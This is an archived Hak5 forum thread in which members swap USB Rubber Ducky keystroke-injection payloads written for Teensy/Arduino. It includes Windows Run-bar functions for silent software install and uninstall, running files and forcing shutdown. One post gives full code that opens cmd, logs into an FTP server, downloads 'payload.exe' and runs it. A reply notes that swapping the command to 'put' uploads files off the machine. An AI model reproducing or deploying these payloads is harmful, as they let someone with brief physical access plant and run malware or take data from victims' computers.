Jump to content

Archived

This topic is now archived and is closed to further replies.

Netshroud

[Version 1] Ducky Payloads

Recommended Posts

now we just need the code for all of them lol I like the idea of doing google docs though lol

Share this post


Link to post
Share on other sites

Well code is the only thing that counts. I don't have one so I'm not gong to do it myself.

Share this post


Link to post
Share on other sites

I'm working on the code. It's mostly done, but I'm waiting for my Ducky to arrive so I can test it before releasing it.

The ones which are highlighted (slightly) have their code already written.

Share this post


Link to post
Share on other sites

Heres a few that i quickly wrote up, their only for windows, ill try and try to make unix ones tomorrow.

void MSISilentUninstall(char *ProductName)
{
  delay(150);
  CommandAtRunBar('wmic product where name=\'' + ProductName + '\' call uninstall');
  delay(20000);
}

void MSISilentInstall(char *MSIFile)
{
  delay(150);
  CommandAtRunBar('msiexec /package ' + MSIFile + ' /quiet');
  delay(5000);
}

void ReleaseRenewIpAddress()
{
  CommandAtRunBar("ipconfig /release");
  delay(1500);
  CommandAtRunBar("ipconfig /renew");
  delay(1500);
}

void ExecuteFile(char *filename)
{
  CommandAtRunBar(filename);
}

void ComputerShutDown(char *timeout)
{
  CommandAtRunBar('shutdown -s -t ' + timeout);
}

void ComputerRestart(char *timeout)
{
  CommandAtRunBar('shutdown -r -t ' + timeout);
}

void ComputerHibernate(char *timeout)
{
  CommandAtRunBar('shutdown -h -t ' + timeout);
}

void ComputerStandby(int timeout)
{
  delay(timeout*1000); // Delay for timeout
  CommandAtRunBar("rundll32 powrprof.dll,SetSuspendState");
}

Share this post


Link to post
Share on other sites

Please please please use the wiki that Darren set up.

This whole idea, using HID this way, was Darren's idea pretty much the moment he first saw Teensy, in the days of episode 503. Darren also financed sending 100 free Ducky kits to the Hak5 community!!

It's really only right to put this on Hak5's wiki. It's new and needs contributions.

http://www.hak5.org/projects/doku.php?id=usb_rubber_ducky

Share this post


Link to post
Share on other sites

Paul, I put that up well before the wiki.

Sl45h3R, have you tested those functions? I'm writing my code in C, but I'm having issues passing strings around, as they need to be PSTR'ed.

Share this post


Link to post
Share on other sites

Yes, these work fine using Arduino IDE + Teensyduino, along with IronGeek's CommandAtRunBar function.

Although, the hibernate function will only work if hibernate is not disabled on the users computer.

Share this post


Link to post
Share on other sites

I have been working on FTP needs a little changing for upload and binary/ascii, I have had a few problems with my ftp server but it should work.

ohhh btw i'm working in the arduino language

void setup() {
  delay(7000);
  run();
  delay(500);
  Keyboard.print("cmd");
  enter();
  delay(500);
  Keyboard.print("ftp");
  enter();
  delay(500);
  Keyboard.print("o 192.168.0.8");
  enter();
  delay(500);
  Keyboard.print("test");
  enter();
  delay(500);
  Keyboard.print("lamepassword");
  enter();
  delay(10);
  Keyboard.print("get payload.exe");
  enter();
  delay(5000);
  Keyboard.print("quit");
  enter();
  delay(10);
  Keyboard.print("payload.exe");
  enter();
} 

void loop() {
    digitalWrite(PIN_D6, LOW);   // LED on
    delay(1000);                  // Slow blink
    digitalWrite(PIN_D6, HIGH);  // LED off
    delay(1000);
}

void enter(){
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void run(){
  // run dialog - win+r
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  // release keys
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(100);
}

Share this post


Link to post
Share on other sites

I already posted my FTP code which can download files, and if you change "get payload.exe" to "put file.txt" it can upload them aswell. With you code, you can save space on the teensy if you delete

o 192.168.0.8

and use

ftp 192.168.0.8

My FTP code

-- edit --

On second thought, this looks very similar to my code.

Share this post


Link to post
Share on other sites
On second thought, this looks very similar to my code.

Wow they are quite similar, you could add the enter line to the echo section scene as it is at the end of each echo.

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...